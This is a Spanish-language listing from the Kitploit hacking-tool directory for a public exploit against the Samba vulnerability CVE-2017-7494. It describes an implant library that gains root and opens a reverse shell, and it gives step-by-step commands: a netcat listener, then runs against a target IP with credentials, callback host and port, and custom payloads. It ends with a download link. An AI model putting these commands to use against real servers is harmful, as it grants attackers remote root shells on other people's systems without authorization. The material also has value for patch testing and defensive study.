Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-7494 — Exploit remoto de root para la vulnerabilidad CVE-2017-7494 de SAMBA | Kitploit
Herramientas/GitHubGitHub/joxeankoret/cve-2017-7494
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónHerramienta de Acceso RemotoArchived
GitHubjoxeankoret/cve-2017-7494

CVE-2017-7494

Exploit remoto de root para la vulnerabilidad CVE-2017-7494 de SAMBA

Ver Repositorio
25974hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-7494

Exploit remoto como root para la vulnerabilidad SAMBA CVE-2017-7494.

Detalles

Este exploit se divide en 2 partes:

  • Primero, compila un payload llamado "implant.c" y genera una librería (libimplantx32.so o libimplantx64.so) que cambia al usuario root, se separa del proceso padre y genera una reverse shell.
  • Segundo, encuentra un recurso compartido escribible en el host objetivo especificado, sube la librería con un nombre aleatorio e intenta cargarlo.

Mientras el objetivo sea vulnerable y el payload sea el correcto para el sistema operativo y arquitectura del objetivo, el exploit es 100% fiable.

Cómo usar

En tu máquina, ejecuta el siguiente comando:

root@kitploit:~
$ nc -p 31337 -l

Luego, ejecuta el exploit contra tu objetivo y espera hasta que se conecte de vuelta a tu Netcat:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Si cierras demasiado rápido la reverse shell, en lugar de volver a ejecutar el exploit subiendo el módulo, etc... puedes simplemente pasar la ruta al módulo que ya subió. Suponiendo que se subió a /shared/directory/ como "module.so", ejecutarías un comando como el siguiente:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

ACTUALIZACIÓN 25/11/2017 - Archivaldo

Ahora puedes ejecutar el exploit contra samba 3.5.0 y 3.6.0, solo necesitas agregar el argumento -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Ahora puedes usar tu propio .so personalizado

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

En caso de que necesites ejecutar este script desde una máquina x86, la compilación de los binarios implant creará dos archivos x86. Usando la bandera -n 1 puedes deshabilitar la compilación y copiar libimplantx64.so desde otra máquina.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

En caso de que samba se ejecute solo en el puerto 139. Puedes establecer el puerto del servidor remoto usando el argumento -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTAS

Ya no lo soporto.

-- Joxean Koret

Descargar herramienta